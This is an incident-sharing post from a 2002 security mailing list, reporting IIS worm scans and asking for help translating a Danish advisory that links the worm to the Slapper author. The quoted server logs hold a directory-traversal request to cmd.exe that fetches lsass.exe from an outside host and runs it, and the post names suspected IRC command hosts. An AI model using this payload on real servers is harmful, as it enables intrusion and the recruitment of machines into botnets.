Re: new IIS worm? (rcp lsass.exe)

["Mike Lewinski" <mike () rockynet com>]

I can confirm these scans are appearing on the first host I checked
here:

2002-09-16 09:18:10 131.251.27.247 - W3SVC2 GET
/scripts/..%5c..%5cwinnt/system32/cmd.exe
/c+rcp+-b+64.21.95.7.lp:lsass.exe+. 401 744 96 80 - -
2002-09-16 09:18:11 131.251.27.247 - W3SVC2 GET
/scripts/..%5c..%5cwinnt/system32/cmd.exe /c+lsass.exe 401 744 73 80 - -

lsass.exe is and has been a longtime component of windows (server
anyway). A check finds these sizes normally:

11,776 bytes - Windows XP
33,552 bytes - Windows 2000 Advanced Server
10,000 bytes - Windows NT4

I used rpc to snag a copy. Interesting output in strings includes:

telsa5.mine.nu
irc.logicfive.nu

Googling for the first host finds an interesting match:

http://www.esec.dk/Nyheder/1909a2002.htm

That site mentions Microsoft IIS server , IRC, Denial-of-Service, zombie
and "kumultative hotfix installeret", but that's about all I understand
of it ;)

Actually, a closer reading seems to reveal that this may be a companion
of slapper:

"Windows program af Slapper ormens forfatter bruges i angreb"
and
"Den "Slapper Worm" der for øjeblikket hærger Apache er i kildeteksten
signeret af "contem@efnet" altså den samme forfatter eller gruppe."

Can anyone translate and shed a little more light on this?

Mike


----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com